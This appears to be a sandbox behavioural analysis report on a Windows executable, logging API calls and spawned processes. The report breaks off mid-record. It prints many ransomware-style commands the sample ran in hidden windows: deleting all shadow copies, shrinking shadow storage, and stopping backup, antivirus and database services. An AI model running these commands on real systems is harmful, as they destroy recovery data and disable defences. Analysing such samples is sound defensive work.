5.2
Medium risk

1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24

42e106fd843b0e3585057c30424f695a.exe

Analysis duration

95s

Last analyzed

File size

101.0KB
Static detection / Dynamic detection
Eagle Eye engine
Not detected (no Eagle Eye engine result available)
Static verdict
Antivirus engines
Not detected (no antivirus engine result available)
Static indicators
Queries for the computername (28 events)
Time & API Arguments Status Return Repeated
1619396140.045501
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396140.045501
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619396142.342001
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396142.358001
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619396143.311876
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396143.311876
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619396143.920251
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396143.920251
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619396144.514626
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396144.514626
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619396145.186876
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396145.186876
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619396145.874374
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396145.874374
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619396149.467751
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396149.467751
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619396150.045876
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396150.045876
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619396150.874001
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396150.874001
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619396151.483374
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396151.483374
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619396152.061499
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396152.061499
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619396152.670251
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396152.670251
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619396153.264251
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619396153.264251
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
Command line console output was observed (50 out of 108 events)
Time & API Arguments Status Return Repeated
1619396138.905501
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396140.045501
WriteConsoleW
buffer: 错误: 意外故障: 没有注册类
console_handle: 0x00000007
success 1 0
1619396142.311001
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396142.358001
WriteConsoleW
buffer: Error:
console_handle: 0x00000007
success 1 0
1619396142.358001
WriteConsoleW
buffer: 卷影复制服务组件遇到了意外错误。 请检查应用程序事件日志以了解详细信息。
console_handle: 0x00000007
success 1 0
1619396143.280876
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396143.311876
WriteConsoleW
buffer: Error:
console_handle: 0x00000007
success 1 0
1619396143.311876
WriteConsoleW
buffer: 卷影复制服务组件遇到了意外错误。 请检查应用程序事件日志以了解详细信息。
console_handle: 0x00000007
success 1 0
1619396143.889251
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396143.920251
WriteConsoleW
buffer: Error:
console_handle: 0x00000007
success 1 0
1619396143.920251
WriteConsoleW
buffer: 卷影复制服务组件遇到了意外错误。 请检查应用程序事件日志以了解详细信息。
console_handle: 0x00000007
success 1 0
1619396144.483626
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396144.514626
WriteConsoleW
buffer: Error:
console_handle: 0x00000007
success 1 0
1619396144.514626
WriteConsoleW
buffer: 卷影复制服务组件遇到了意外错误。 请检查应用程序事件日志以了解详细信息。
console_handle: 0x00000007
success 1 0
1619396145.155876
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396145.186876
WriteConsoleW
buffer: Error:
console_handle: 0x00000007
success 1 0
1619396145.186876
WriteConsoleW
buffer: 卷影复制服务组件遇到了意外错误。 请检查应用程序事件日志以了解详细信息。
console_handle: 0x00000007
success 1 0
1619396145.842374
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396145.874374
WriteConsoleW
buffer: Error:
console_handle: 0x00000007
success 1 0
1619396145.874374
WriteConsoleW
buffer: 卷影复制服务组件遇到了意外错误。 请检查应用程序事件日志以了解详细信息。
console_handle: 0x00000007
success 1 0
1619396149.436751
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396149.467751
WriteConsoleW
buffer: Error:
console_handle: 0x00000007
success 1 0
1619396149.467751
WriteConsoleW
buffer: 卷影复制服务组件遇到了意外错误。 请检查应用程序事件日志以了解详细信息。
console_handle: 0x00000007
success 1 0
1619396150.014876
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396150.045876
WriteConsoleW
buffer: Error:
console_handle: 0x00000007
success 1 0
1619396150.045876
WriteConsoleW
buffer: 卷影复制服务组件遇到了意外错误。 请检查应用程序事件日志以了解详细信息。
console_handle: 0x00000007
success 1 0
1619396150.842001
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396150.874001
WriteConsoleW
buffer: Error:
console_handle: 0x00000007
success 1 0
1619396150.874001
WriteConsoleW
buffer: 卷影复制服务组件遇到了意外错误。 请检查应用程序事件日志以了解详细信息。
console_handle: 0x00000007
success 1 0
1619396151.452374
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396151.483374
WriteConsoleW
buffer: Error:
console_handle: 0x00000007
success 1 0
1619396151.483374
WriteConsoleW
buffer: 卷影复制服务组件遇到了意外错误。 请检查应用程序事件日志以了解详细信息。
console_handle: 0x00000007
success 1 0
1619396152.030499
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396152.061499
WriteConsoleW
buffer: Error:
console_handle: 0x00000007
success 1 0
1619396152.061499
WriteConsoleW
buffer: 卷影复制服务组件遇到了意外错误。 请检查应用程序事件日志以了解详细信息。
console_handle: 0x00000007
success 1 0
1619396152.639251
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396152.670251
WriteConsoleW
buffer: Error:
console_handle: 0x00000007
success 1 0
1619396152.670251
WriteConsoleW
buffer: 卷影复制服务组件遇到了意外错误。 请检查应用程序事件日志以了解详细信息。
console_handle: 0x00000007
success 1 0
1619396153.249251
WriteConsoleW
buffer: vssadmin 1.1 - 卷影复制服务管理命令行工具 (C) 版权所有 2001-2005 Microsoft Corp.
console_handle: 0x00000007
success 1 0
1619396153.264251
WriteConsoleW
buffer: 错误: 意外故障: 没有注册类
console_handle: 0x00000007
success 1 0
1619396158.999001
WriteConsoleW
buffer: 服务名无效。
console_handle: 0x0000000b
success 1 0
1619396158.999001
WriteConsoleW
buffer: 请键入 NET HELPMSG 2185 以获得更多的帮助。
console_handle: 0x0000000b
success 1 0
1619396159.764499
WriteConsoleW
buffer: 服务名无效。
console_handle: 0x0000000b
success 1 0
1619396159.764499
WriteConsoleW
buffer: 请键入 NET HELPMSG 2185 以获得更多的帮助。
console_handle: 0x0000000b
success 1 0
1619396160.561751
WriteConsoleW
buffer: 服务名无效。
console_handle: 0x0000000b
success 1 0
1619396160.561751
WriteConsoleW
buffer: 请键入 NET HELPMSG 2185 以获得更多的帮助。
console_handle: 0x0000000b
success 1 0
1619396161.342001
WriteConsoleW
buffer: 服务名无效。
console_handle: 0x0000000b
success 1 0
1619396161.342001
WriteConsoleW
buffer: 请键入 NET HELPMSG 2185 以获得更多的帮助。
console_handle: 0x0000000b
success 1 0
1619396162.124251
WriteConsoleW
buffer: 服务名无效。
console_handle: 0x0000000b
success 1 0
1619396162.139251
WriteConsoleW
buffer: 请键入 NET HELPMSG 2185 以获得更多的帮助。
console_handle: 0x0000000b
success 1 0
Behavioral verdict
Dynamic indicators
Creates a suspicious process (47 events)
cmdline cmd.exe /c net stop EPSecurityService /y
cmdline cmd.exe /c net stop BackupExecAgentBrowser /y
cmdline cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
cmdline cmd.exe /c net stop FA_Scheduler /y
cmdline cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
cmdline cmd.exe /c net stop BackupExecVSSProvider /y
cmdline cmd.exe /c net stop AcronisAgent /y
cmdline cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
cmdline cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
cmdline cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
cmdline cmd.exe /c net stop "SQLsafe Backup Service" /y
cmdline cmd.exe /c net stop "SQLsafe Filter Service" /y
cmdline cmd.exe /c net stop BackupExecManagementService /y
cmdline cmd.exe /c net stop McShield /y
cmdline cmd.exe /c net stop Antivirus /y
cmdline cmd.exe /c net stop "Enterprise Client Service" /y
cmdline cmd.exe /c net stop BackupExecRPCService /y
cmdline cmd.exe /c net stop BackupExecDeviceMediaService /y
cmdline cmd.exe /c net stop mfemms /y
cmdline cmd.exe /c net stop McTaskManager /y
cmdline cmd.exe /c net stop mozyprobackup /y
cmdline cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
cmdline cmd.exe /c net stop MsDtsServer /y
cmdline cmd.exe /c net stop AcrSch2Svc /y
cmdline cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
cmdline cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
cmdline cmd.exe /c net stop "Acronis VSS Provider" /y
cmdline cmd.exe /c net stop DCAgent /y
cmdline cmd.exe /c net stop EsgShKernel /y
cmdline cmd.exe /c net stop ARSM /y
cmdline cmd.exe /c net stop MMS /y
cmdline cmd.exe /c net stop IMAP4Svc /y
cmdline cmd.exe /c net stop EraserSvc11710 /y
cmdline cmd.exe /c net stop bedbg /y
cmdline cmd.exe /c net stop IISAdmin /y
cmdline cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
cmdline cmd.exe /c net stop BackupExecJobEngine /y
cmdline cmd.exe /c net stop MsDtsServer100 /y
cmdline cmd.exe /c net stop mfevtp /y
cmdline cmd.exe /c net stop "Veeam Backup Catalog Data Service" /y
cmdline cmd.exe /c net stop MsDtsServer110 /y
cmdline cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
cmdline cmd.exe /c net stop BackupExecAgentAccelerator /y
cmdline cmd.exe /c net stop EPUpdateService /y
cmdline cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
cmdline cmd.exe /c vssadmin Delete Shadows /all /quiet
cmdline cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
A process created a hidden window (48 events)
Time & API Arguments Status Return Repeated
1619396138.342126
CreateProcessInternalW
thread_identifier: 1272
thread_handle: 0x000000d4
process_identifier: 1760
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin Delete Shadows /all /quiet
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396141.999126
CreateProcessInternalW
thread_identifier: 2308
thread_handle: 0x000000d8
process_identifier: 2976
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396142.905126
CreateProcessInternalW
thread_identifier: 2956
thread_handle: 0x000000d4
process_identifier: 2940
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396143.499126
CreateProcessInternalW
thread_identifier: 3148
thread_handle: 0x000000d8
process_identifier: 3144
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396144.108126
CreateProcessInternalW
thread_identifier: 3316
thread_handle: 0x000000d4
process_identifier: 3312
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396144.733126
CreateProcessInternalW
thread_identifier: 3492
thread_handle: 0x000000d8
process_identifier: 3488
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396145.436126
CreateProcessInternalW
thread_identifier: 3660
thread_handle: 0x000000d4
process_identifier: 3656
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396146.061126
CreateProcessInternalW
thread_identifier: 3832
thread_handle: 0x000000d8
process_identifier: 3828
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396149.670126
CreateProcessInternalW
thread_identifier: 4020
thread_handle: 0x000000d4
process_identifier: 4016
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396150.249126
CreateProcessInternalW
thread_identifier: 3176
thread_handle: 0x000000d8
process_identifier: 3172
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396151.077126
CreateProcessInternalW
thread_identifier: 3400
thread_handle: 0x000000d4
process_identifier: 3404
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396151.670126
CreateProcessInternalW
thread_identifier: 3644
thread_handle: 0x000000d8
process_identifier: 3584
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396152.264126
CreateProcessInternalW
thread_identifier: 3812
thread_handle: 0x000000d4
process_identifier: 3816
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396152.874126
CreateProcessInternalW
thread_identifier: 3896
thread_handle: 0x000000d8
process_identifier: 4012
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin Delete Shadows /all /quiet
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396155.764126
CreateProcessInternalW
thread_identifier: 3448
thread_handle: 0x000000d4
process_identifier: 3432
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop "Acronis VSS Provider" /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396159.233126
CreateProcessInternalW
thread_identifier: 3916
thread_handle: 0x000000d8
process_identifier: 2796
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop "Enterprise Client Service" /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396159.999126
CreateProcessInternalW
thread_identifier: 2168
thread_handle: 0x000000d4
process_identifier: 3348
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop "SQLsafe Backup Service" /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396160.795126
CreateProcessInternalW
thread_identifier: 2988
thread_handle: 0x000000d8
process_identifier: 3084
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop "SQLsafe Filter Service" /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396161.608126
CreateProcessInternalW
thread_identifier: 3676
thread_handle: 0x000000d4
process_identifier: 2168
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop "Veeam Backup Catalog Data Service" /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396162.358126
CreateProcessInternalW
thread_identifier: 4084
thread_handle: 0x000000d8
process_identifier: 1344
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop AcronisAgent /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396163.108126
CreateProcessInternalW
thread_identifier: 4212
thread_handle: 0x000000d4
process_identifier: 4208
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop AcrSch2Svc /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396163.905126
CreateProcessInternalW
thread_identifier: 4428
thread_handle: 0x000000d8
process_identifier: 4424
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop Antivirus /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396167.155126
CreateProcessInternalW
thread_identifier: 4652
thread_handle: 0x000000d4
process_identifier: 4648
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop ARSM /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396168.999126
CreateProcessInternalW
thread_identifier: 4872
thread_handle: 0x000000d8
process_identifier: 4868
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop BackupExecAgentAccelerator /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396170.155126
CreateProcessInternalW
thread_identifier: 5096
thread_handle: 0x000000d4
process_identifier: 5092
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop BackupExecAgentBrowser /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396172.514126
CreateProcessInternalW
thread_identifier: 4388
thread_handle: 0x000000d8
process_identifier: 4384
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop BackupExecDeviceMediaService /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396175.108126
CreateProcessInternalW
thread_identifier: 4428
thread_handle: 0x000000d4
process_identifier: 4644
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop BackupExecJobEngine /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396175.874126
CreateProcessInternalW
thread_identifier: 4992
thread_handle: 0x000000d8
process_identifier: 4988
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop BackupExecManagementService /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396176.749126
CreateProcessInternalW
thread_identifier: 3588
thread_handle: 0x000000d4
process_identifier: 4336
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop BackupExecRPCService /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396178.264126
CreateProcessInternalW
thread_identifier: 4680
thread_handle: 0x000000d8
process_identifier: 4468
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop BackupExecVSSProvider /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396183.655126
CreateProcessInternalW
thread_identifier: 4248
thread_handle: 0x000000d4
process_identifier: 4296
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop bedbg /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396184.420126
CreateProcessInternalW
thread_identifier: 4752
thread_handle: 0x000000d8
process_identifier: 4820
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop DCAgent /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396185.233126
CreateProcessInternalW
thread_identifier: 1500
thread_handle: 0x000000d4
process_identifier: 1416
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop EPSecurityService /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396186.186126
CreateProcessInternalW
thread_identifier: 4428
thread_handle: 0x000000d8
process_identifier: 4976
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop EPUpdateService /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396187.014126
CreateProcessInternalW
thread_identifier: 4156
thread_handle: 0x000000d4
process_identifier: 5004
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop EraserSvc11710 /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396188.639126
CreateProcessInternalW
thread_identifier: 2212
thread_handle: 0x000000d8
process_identifier: 4108
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop EsgShKernel /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396189.420126
CreateProcessInternalW
thread_identifier: 5260
thread_handle: 0x000000d4
process_identifier: 5256
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop FA_Scheduler /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396190.702126
CreateProcessInternalW
thread_identifier: 5480
thread_handle: 0x000000d8
process_identifier: 5476
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop IISAdmin /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396191.530126
CreateProcessInternalW
thread_identifier: 5720
thread_handle: 0x000000d4
process_identifier: 5716
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop IMAP4Svc /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396192.311126
CreateProcessInternalW
thread_identifier: 5948
thread_handle: 0x000000d8
process_identifier: 5944
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop McShield /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396193.061126
CreateProcessInternalW
thread_identifier: 5356
thread_handle: 0x000000d4
process_identifier: 5448
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop McTaskManager /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396193.842126
CreateProcessInternalW
thread_identifier: 5784
thread_handle: 0x000000d8
process_identifier: 5788
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop mfemms /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396194.608126
CreateProcessInternalW
thread_identifier: 5144
thread_handle: 0x000000d4
process_identifier: 5864
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop mfevtp /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396195.670126
CreateProcessInternalW
thread_identifier: 5588
thread_handle: 0x000000d8
process_identifier: 5552
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop MMS /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396196.374126
CreateProcessInternalW
thread_identifier: 2368
thread_handle: 0x000000d4
process_identifier: 2480
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop mozyprobackup /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396197.186126
CreateProcessInternalW
thread_identifier: 6112
thread_handle: 0x000000d8
process_identifier: 6012
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop MsDtsServer /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
1619396197.967126
CreateProcessInternalW
thread_identifier: 2368
thread_handle: 0x000000d4
process_identifier: 5460
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop MsDtsServer100 /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d8
inherit_handles: 0
success 1 0
1619396198.827126
CreateProcessInternalW
thread_identifier: 6124
thread_handle: 0x000000d8
process_identifier: 5312
current_directory:
filepath:
track: 1
command_line: cmd.exe /c net stop MsDtsServer110 /y
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000000d4
inherit_handles: 0
success 1 0
Checks for the Locally Unique Identifier on the system for a suspicious privilege (14 events)
Time & API Arguments Status Return Repeated
1619396138.905501
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1619396142.311001
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1619396143.264876
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1619396143.874251
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1619396144.467626
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1619396145.139876
LookupPrivilegeValueW
system_name:
